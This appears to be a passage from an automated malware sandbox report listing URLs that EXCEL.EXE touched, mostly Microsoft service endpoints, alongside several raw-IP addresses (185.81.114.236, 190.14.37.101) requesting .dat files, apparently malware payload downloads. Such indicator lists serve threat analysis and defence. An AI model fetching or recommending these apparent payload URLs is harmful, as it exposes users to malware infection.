                https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                  		high
                  https://login.windows.net/common/oauth2/authorizerXEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                    		high
                    http://185.81.114.236/5563209-4053062332-1002EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://schemas.openEXCEL.EXE, 00000000.00000003.829481826.0000000012C79000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.828673891.0000000015551000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829005283.000000001550D000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                      		high
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                        		high
                        http://190.14.37.101/44532.8765170139.datcEXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.EXCEL.EXE, 00000000.00000002.980136152.000000000D3AC000.00000004.00000001.sdmpfalse
                          		high
                          https://api.aadrm.com/EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://login.windEXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://clients.config.office.net/AjEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                            		high
                            http://185.81.114.236/44532.8765170139.dat_EXCEL.EXE, 00000000.00000003.886889472.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791754517.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.984241011.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.830841555.000000001528F000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://login.windows.net/common/oauth2/authorize:ULEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                              		high
                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformEXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmpfalse
                                		high
                                https://login.windows.net/common/oauth2/authorizeRZEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                  		high
                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                    		high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000000.00000002.981507571.0000000012880000.00000004.00000001.sdmpfalse
                                      		high
                                      https://api.microsoftstream.com/api/EXCEL.EXE, 00000000.00000002.982062545.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656095068.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                        		high
                                        https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                          		high
                                          http://190.14.37.101/44532.8765170139.datSEXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://cr.office.comEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                            		high
                                            https://api.powerbi.com/v1.0/myorg/groupsHEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                              		high
                                              https://login.windows.net/common/oauth2/authorize;VsEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                		high
                                                http://190.14.37.101/44532.8765170139.datOEXCEL.EXE, 00000000.00000003.713091616.000000001528F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728295754.000000001528F000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://login.windows.net/common/oauth2/authorizesYEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://login.windows.net/common/oauth2/authorizecomeEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://res.getmicrosoftkey.com/api/redemptionevents630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://tasks.office.comEXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                      		high
                                                      https://officeci.azurewebsites.net/api/EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://api.microsoftstream.com/api/WkEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://login.windows.net/common/oauth2/authorize#EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://store.office.cn/addinstemplateEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://login.windows.net/common/oauth2/authorize&EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://login.windows.net/common/oauth2/authorizepZEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://graph.windows.net/eeEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://outlook.office365.com/BEXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                    		high
                                                                    https://loki.delve.office.com/api/v1/configuration/officewin32/%EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://substrate.office.comlEXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.odwebp.svc.ms630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://api.powerbi.com/v1.0/myorg/groups630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                        		high
                                                                        https://web.microsoftstream.com/video/EXCEL.EXE, 00000000.00000002.982062545.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656095068.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                          		high
                                                                          https://api.addins.store.officeppe.com/addinstemplate630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
